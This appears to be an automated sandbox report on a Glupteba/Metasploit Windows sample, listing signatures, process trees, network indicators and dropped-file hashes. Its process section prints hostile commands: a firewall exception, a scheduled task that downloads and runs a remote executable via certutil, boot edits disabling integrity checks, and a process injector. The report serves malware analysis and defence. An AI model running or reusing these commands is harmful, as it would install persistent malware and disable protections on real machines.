Malware Analysis Report

2025-08-05 12:47

Sample ID 240122-jnxr6sbhg4
Target 6f1f130741c10e884ac91387ba6f1671
SHA256 4dcc466c7b711acae584e6305f8b5d16f95b443cb719f00de89dfb6e5b32cf03
Tags
glupteba metasploit backdoor dropper evasion loader trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4dcc466c7b711acae584e6305f8b5d16f95b443cb719f00de89dfb6e5b32cf03

Threat Level: Known bad

The file 6f1f130741c10e884ac91387ba6f1671 was found to be: Known bad.

Malicious Activity Summary

glupteba metasploit backdoor dropper evasion loader trojan

Glupteba

MetaSploit

Glupteba payload

Modifies boot configuration data using bcdedit

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Program crash

Creates scheduled task(s)

GoLang User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-22 07:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-22 07:49

Reported

2024-01-22 07:52

Platform

win7-20231215-en

Max time kernel

1s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Possible attempt to disable PatchGuard

evasion

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

GoLang User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122074937.log C:\Windows\Logs\CBS\CbsPersist_20240122074937.cab

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /124-124

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 f07d4c85-f10f-4500-992e-9c511decba96.ninhaine.com udp
US 8.8.8.8:53 server4.ninhaine.com udp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
GB 96.17.179.184:80 apps.identrust.com tcp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 spolaect.info udp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
CZ 46.8.8.100:443 server4.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 server4.2makestorage.com udp

Files

memory/2124-0-0x0000000004960000-0x0000000004D9C000-memory.dmp

memory/2124-1-0x0000000004960000-0x0000000004D9C000-memory.dmp

memory/2124-2-0x0000000004DA0000-0x00000000056C6000-memory.dmp

memory/2124-3-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2972-5-0x0000000004B60000-0x0000000004F9C000-memory.dmp

memory/2124-4-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2124-6-0x0000000004960000-0x0000000004D9C000-memory.dmp

memory/2124-7-0x0000000004DA0000-0x00000000056C6000-memory.dmp

memory/2972-8-0x0000000004B60000-0x0000000004F9C000-memory.dmp

memory/2972-9-0x0000000000400000-0x00000000030F3000-memory.dmp

\Windows\rss\csrss.exe

MD5 499eabd4f1dff82cb81cb4c3df44da76
SHA1 2765b4730b364627585119311b0fce87ef9c6e45
SHA256 296f916a6ac6f5e77bd15b649435d11de60fc543bfe0cba3b9c42614ddfbae67
SHA512 e4585c28abd47404917e567f8ce3a3208cc989d93b27cc600948933d1fcd29b4576e0ed8346ee14079f1abd363652164942cee14f710976461a738102beb3477

\Windows\rss\csrss.exe

MD5 6aa89987b804232510d11688123a8c11
SHA1 d64c4e47737a23425f250b1a82ac4f5f2f8a0f27
SHA256 00ed550c939809e40115afd5a321c932fd03650435e453aac9e0ab6c154b3aad
SHA512 c67d6d106735ddf9ec7067ef35295699f113104209e5c33fdc4b51e8835ae4befca59ec98933e93020e502fea3c67eaf34e40a3452f600ee19cb98211c63ec1b

C:\Windows\rss\csrss.exe

MD5 3fe278eb70b96c11868a3134e1c4ff6f
SHA1 8d962a63dea82f8edbbf9bd361003cceb8464cba
SHA256 a348f3052917186e1031aa220b3a29eca010d710f9cca8bfab3046108be4349d
SHA512 69012fd021aacc73365a205beacf88848de295a6474a7a2b4cc76c6d657838c90cb6e991bc64ee939df2337586e527a0ea30f2ab8d71f1248d01906b36143e3e

memory/2972-17-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 fedef76d64a91a88ebb634be8f4db93a
SHA1 907a52726c41cd6f85cd71b7e959c41954d1e0a5
SHA256 762bdf38f5a4db112a6fbade2705683ebec7c8ecd14877980d8a9e65d10521c6
SHA512 22bdd544d20eb1c977089d36cc82f7acd8493a0f4dfe924a7d8759ffe8f18fa549d10c26c2fe344eef6535a8072af2c83a42bfe79971fb1f9efaad0e6b63ccf7

memory/2548-19-0x0000000004A40000-0x0000000004E7C000-memory.dmp

memory/2972-20-0x0000000004B60000-0x0000000004F9C000-memory.dmp

memory/2548-21-0x0000000004A40000-0x0000000004E7C000-memory.dmp

memory/2548-22-0x0000000004E80000-0x00000000057A6000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 2c27b040963e92ed4e5a0a1dc86b62f2
SHA1 40008cb09009e199e7c2834f29243933f525914f
SHA256 bebf3ef90b5afcadbceaa3f6d31ec605e887771ca0ca080610302d4fc45a4ddb
SHA512 af213a4a27759419488b4fdcd6ded9b79ae17f5b97828f39c7680122554508003e132bc6e91bc9a7421127af29f313b24ceb0726ef3ac4305c953be1cbe67aca

memory/2548-24-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 74942d6ff7cf9cef6a929e6228c6c30b
SHA1 df75f4f9be14926a7ff62c42cc016d3a7058ab7d
SHA256 fda06ef0fbfa14278810a43cd9675aa09bcf6b41a500bc8dc7e8b643f4f8933b
SHA512 20e6f5a3ac3013661e21a943d367afebe7218df808d8a991facbae6246d55b8c446e089975cf6d09919f8f699bb08771d6e0777e62aae39897728c4abf39bb69

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 4b25a3c843dd6c49f625b914b0facc65
SHA1 e518e8f8e25e0d3410954b9e04d456c46d24f54b
SHA256 a4a3ee25c5644d1c406ce750991a1e8e69dc45a60936bad0f9a7c8339ef6113b
SHA512 31f1f0e94755f0486fa39c6ba6e98ef8ed4c453a0a5d5a3e60b943110aea3f189fa06674373ac25b64683c8d9f0cb7da62c6bd64e6b340e0ec436e5214e2c39c

memory/2748-41-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 3b9d4a06fa57529e13413f6d0cf46b63
SHA1 fa6f1391f42647cdc9658eb6d05d0b77afc660f5
SHA256 6f17cbec30d5f10a54caa28bf51acc2a6177874a5044b4f11e2a4d1fb45105be
SHA512 48f63d24665c842e800cdc935db795b39e032105804ffa0903c6aa6d39fd8db76e4a7a70cc0644b9c3b47c3555ab037ddf88acfa2e485d86354cbb04fd181571

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 95dbc04b5f2d043c9c7443bf470086a3
SHA1 943883ffe35711841b401520869e53fdab395e78
SHA256 6d0a948892711fdf81fd0c4cb8d4a0cb6ecbb2a936b31184713331bea6871ce5
SHA512 9dee05936d7f6913319329a029c2c40a2a2fd041b586a4662c05b4653ac16745b7ebc5f8538da4df3c1b9b4011bd4aed0b6a4b17e4211dd2d93f03ebbb5dec36

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 c0c77b59c5c75aecfbed31b0a4d5040f
SHA1 691cb3493a4cfe9dd3f58036655717b6c8da61e1
SHA256 92342a944b20cf24028d6c24c0bbbe2b7afc3519f6bddea15575547453fe70fc
SHA512 b0538141a9faac53ad2cc498d7a6dd40d636384c5db1c32cabf2ee9ebfbe3a099646f33f0f6b009918aa68400426c907de40b95689710917dcfe2c439288a704

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 8bb42841aea78353b557b14cc8caaf2e
SHA1 83357aebec0b7eb5064df71e2adac7f849012e1d
SHA256 43a71be8749fa13e6b7e1043aa16c91434fb0b877e01dddc76a83caf3b1bd6fb
SHA512 83634b429bc741b23b368b510e0eff21da1fccc32ba7e22baf2722b6949d76de3b9cf1301c73aa391ababb075252b1688864cd9f5f9ca3a561695a34ecda6a40

memory/2748-55-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 d89216df6c609e1e65bc9d9fd7eaa50c
SHA1 c411ef43e96321f9458b840a07f8d5368d19056b
SHA256 819baa1197c8f66f68f1c3da68a3e11e7e71c4a8624a4ddef8a3d577ea70408e
SHA512 c3458057119167d1fc973ad11cf828af2239761b5bd6970b7904110aacabfdcc77eab98cc41fcbe671c910e93cb2c4007aecf4984b5edfb08cd129ab3849aac0

C:\Windows\Temp\Tar7929.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Windows\Temp\Cab78E7.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 51f4aa589d408c2a627caac66cb2584e
SHA1 c2bf0001b7f48eec67e4813243a27bdc42e05a64
SHA256 f40e3b92dd02cd4293b7422bdd607226ea9fad2c2eb55a651d80109c273de673
SHA512 19b12b3b8b1b6109cd38e5e79e563952e8881767a311a958fbc526dc48fa3febf2fe23b67c8b197c04cc13a6e9479cd1d2a1a6c2d88f69a88b13719a1262f708

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a9c83c96196a21934eaed36566618795
SHA1 db7972224cb8b8b84c92aff05c42b69ea4b29ecf
SHA256 996cd2357911d3813ca5f2a8196d678478d0bb09a5aec29614d78729f85855eb
SHA512 4da6feb77c64cf6de741926e5763dd6470c55a6d3dac9e33f1272d6de01fe40b0f2f6f2aadb72fdba481245944f7fcf430fba5e1c51ffd70eebde2cd392b312a

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 643309e4f3f5942508b336c0effd1f5e
SHA1 aac8c8cd90ad5df42599c07c3afdafb599f5a99f
SHA256 630c96332e449f3ed6d2c39bf0d505a5903ec8efcf837dfed74d7b82ae256144
SHA512 a5fd5cb185d0f55d94bdf5a9fb827b9718c0a547854c04e565b08492a12223a04ae675ea5890b34105df839c37b76b3895026a16770c92122525c27b3669d232

memory/2548-248-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-252-0x0000000004A40000-0x0000000004E7C000-memory.dmp

memory/2548-253-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 e955c94aeb61e140041a36add84b3892
SHA1 f78eb1719a849e342091c6dc22eea460f6872ae5
SHA256 0f7fbfa8efb1954f08b8a3caf56c72a5d3b6e7c29b70850f363d657fa318f8cf
SHA512 661f5be3c15eab627e2788d01dadb778451c7bf184484c228263f8c46791a18db59fd0bcf2fd4a893ea9720295ac549806bbd9509bc0fb930d2ebe0f237116aa

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 c05fb950baacf9ce156280ea8407c203
SHA1 422c0d5b242dfbacd8999be8b00807089f41c1a7
SHA256 1a648175286d173facd9645e706393d13abb53feb76b2aa17a4f68e0f683af01
SHA512 e90991e19923e242bbf0234412e58eb3f0499786382db7e2a1bbf1bf1eae7a8e558ac54939232bb07f7eb59f5e1aa74cb0705cc50487cae5bbd3df0cdb939da2

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 02f3936dbdb185641196388ea56f8060
SHA1 b66c9fbf39b6be44e9fe9ffc8caff260ab74ee64
SHA256 7473b90564b881e251dd89d33b31bb18008f5c51d2ddadb2a0437d111e8bbe4e
SHA512 1c00b654a85f359b168b3c88318598c47ec88e34490fe368efdbcfed6220703f7d11f3595937f807fb817eea65290ffcdd8b18d605d3d7bc6f7cb6d2a7d27335

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7b57b837e31b145d77f4d575df1b8c5
SHA1 8fd19ae163f3d4e53b2e1459fbe98bbe43310784
SHA256 27dde6fca4c2dba5f681cf252a57ed4e1d587f386cce783d0c98ea1fa88812e6
SHA512 9dd507b32ce0cd549497ab52a643ba5917f72e86f9ce5b58ca5c6ed684172d8097921791790282455dad2997068604c161f1d2db158c1374bee037db638e8a0b

memory/2548-305-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2548-331-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-337-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-338-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-363-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-364-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-365-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-366-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-367-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-368-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-369-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/2548-370-0x0000000000400000-0x00000000030F3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-22 07:49

Reported

2024-01-22 07:52

Platform

win10v2004-20231222-en

Max time kernel

3s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
